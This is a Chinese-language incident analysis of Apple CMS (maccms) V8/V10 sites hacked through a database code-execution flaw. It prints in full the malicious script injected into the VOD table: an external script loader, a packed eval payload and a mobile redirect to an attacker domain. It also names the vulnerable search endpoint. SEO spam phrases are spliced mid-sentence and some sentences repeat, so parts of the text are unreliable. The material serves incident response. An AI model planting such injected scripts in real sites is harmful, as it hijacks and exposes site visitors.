最新苹果cms漏洞被挂马修复

2020年刚开始苹果CMS被爆出数据库代码执行漏洞大量的电影网站被挂马怎么做网站优化大量的电影网站被挂马尤其电影的页面被篡改植入了恶意代码数据库中的VOD表里的d_name被全部修改导致网站打开后直接跳转到S站或者弹窗广告目前该maccms漏洞受影响的苹果系统版本是V8,V10很多客户网站被反复篡改很无奈通过朋友介绍找到我们寻求技术上支持防止网站被挂马。

首先很多站长以为升级了苹果CMS官方最新的漏洞补丁就没问题了通过我们技术对补丁的代码安全分析发现该漏洞补丁对当前的数据库代码执行漏洞是没有任何效果的于事无补网站还会继续被攻击。

我们来看下客户网站目前发生的挂马问题打开网站首页以及各个电影地址都会被插入挂马代码如下图所示：

打包压缩了一份网站源代码以及nginx网站日志文件我们工程师在根目录下发现被上传了网站webshell木马文件通过网站日志溯源追踪我们查看到访问这个PHP脚本木马文件的是一个韩国的IP具体的代码如下图：

代码做了加密处理我们对其解密发现该代码的功能可以对网站进行上传下载修改代码操作数据库等功能属于PHP大马的范畴也叫webshell木马文件我们又对苹果CMS的源代码进行了人工安全审计发现index.php代码对搜索模块上做的一些恶意代码过滤检查存在漏洞可导致攻击者绕过安全过滤直接将SQL插入代码执行到数据库当中去。

我们对数据库进行安全检测发现在VOD表的d_name被批量植入了挂马代码：

<script src=https://www.kilin.xyz/1.js> eval(function(p,a,c,k,e,d){e=function(c) {return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}; if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c); k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;}; while(c--)if(k[c])p=p.replace(newPRegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;} ('4.5(\'<61="3/2" 7="//0.b.c.d/8.0"><\\/9\'+\'a>\'); ',14,14,'js|type|javascript|text|document|write|script|src|20487493|scr|ipt|users|51|la'.split('|'),0,{})); var LOUMtBZeW=navigator["userAgent"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null; if(LOUMtBZeW){setTimeout('window.location.href="https://m.qiche-hangjia.com:168/ua80666/"',500)}

这手法很专业不是一般的攻击者所为针对手机端做了跳转以及隐藏嵌入让网站运营者根本无法察觉发现还判断了cookies来路达到条件才能触发攻击者植入的广告代码。继续安全分析与追踪网站SEO优化方法达到条件才能触发攻击者植入的广告代码。继续安全分析与追踪发现了攻击者的手法POST提交到/index.php?m=vod-searchPOST内容是加密的这里就不方便发出了属于漏洞攻击了可能会给其他使用苹果CMS系统的网站造成攻击我们技术对POST攻击代码进行了解密分析发现确实是绕过了苹果官方V8V10系统的代码安全过滤直接将挂马代码插入到了数据库里了。

问题根源找到了网站SEO优化方法直接将挂马代码插入到了数据库里了。